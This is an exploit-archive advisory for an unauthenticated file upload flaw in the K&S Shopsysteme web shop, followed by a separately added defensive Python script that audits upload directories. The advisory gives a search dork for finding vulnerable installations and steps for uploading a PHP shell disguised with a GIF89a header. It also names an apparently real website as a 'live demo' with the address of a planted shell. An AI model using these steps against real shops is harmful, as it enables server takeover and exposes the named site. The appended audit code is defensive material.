K&S Shopsysteme Arbitrary Remote File Upload Vulnerability

2008-12-17T00:00:00
ID 1337DAY-ID-4485
Type zdt
Reporter mNt
Modified 2008-12-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
==========================================================
K&S Shopsysteme Arbitrary Remote File Upload Vulnerability
==========================================================


## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [results 191 - 200 of about 32.900 for Powered by K&S Media Concept - Shopsysteme (0,51 seconds)]

## Use:

http://www.example.com/

Then append /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

Upload the PHP shell file

It is then reachable at the URL: http://www.example.com/images/upload/mNt.php

Attention: Shell Code In GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## PHP Shell Address: http://www.trampleandfetish.de/images/upload/data.php
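
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it audits an upload directory such as images/upload/ for files outside an image allowlist and for PHP open tags sitting behind a GIF/PNG/JPEG signature. The allowlist, the function names and the sample files are constructed assumptions.

```python
from pathlib import Path
import re
import tempfile

ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}  # assumption: image-only directory
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)  # hits are triage leads

def audit_file(path):
    """Return the reasons a file in an image upload directory looks wrong."""
    reasons = []
    ext = path.suffix.lower()
    if ext not in ALLOWED_EXT:
        reasons.append("extension %r not in image allowlist" % ext)
    data = path.read_bytes()
    has_magic = data.startswith(IMAGE_MAGIC)
    if not has_magic:
        reasons.append("no GIF/PNG/JPEG signature")
    if PHP_TAG.search(data):
        # A leading image signature does not make the rest of the file an image.
        where = "after a valid image signature" if has_magic else "in file body"
        reasons.append("PHP open tag " + where)
    return reasons

def audit_upload_dir(root):
    """Map relative path -> reasons for every suspicious file under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            reasons = audit_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    """Audit a temporary directory of constructed sample files."""
    samples = {
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",  # header only, no code
        "sample.php": b"GIF89a<?php /* constructed placeholder */ ?>",
        "banner.gif": b"GIF89a<?php /* constructed placeholder */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            (Path(root) / name).write_bytes(body)
        return audit_upload_dir(root)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

The banner.gif case shows why a signature check alone does not validate an upload. The complementary server-side controls are authentication on the admin editor path and an upload directory that the web server never executes scripts from.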


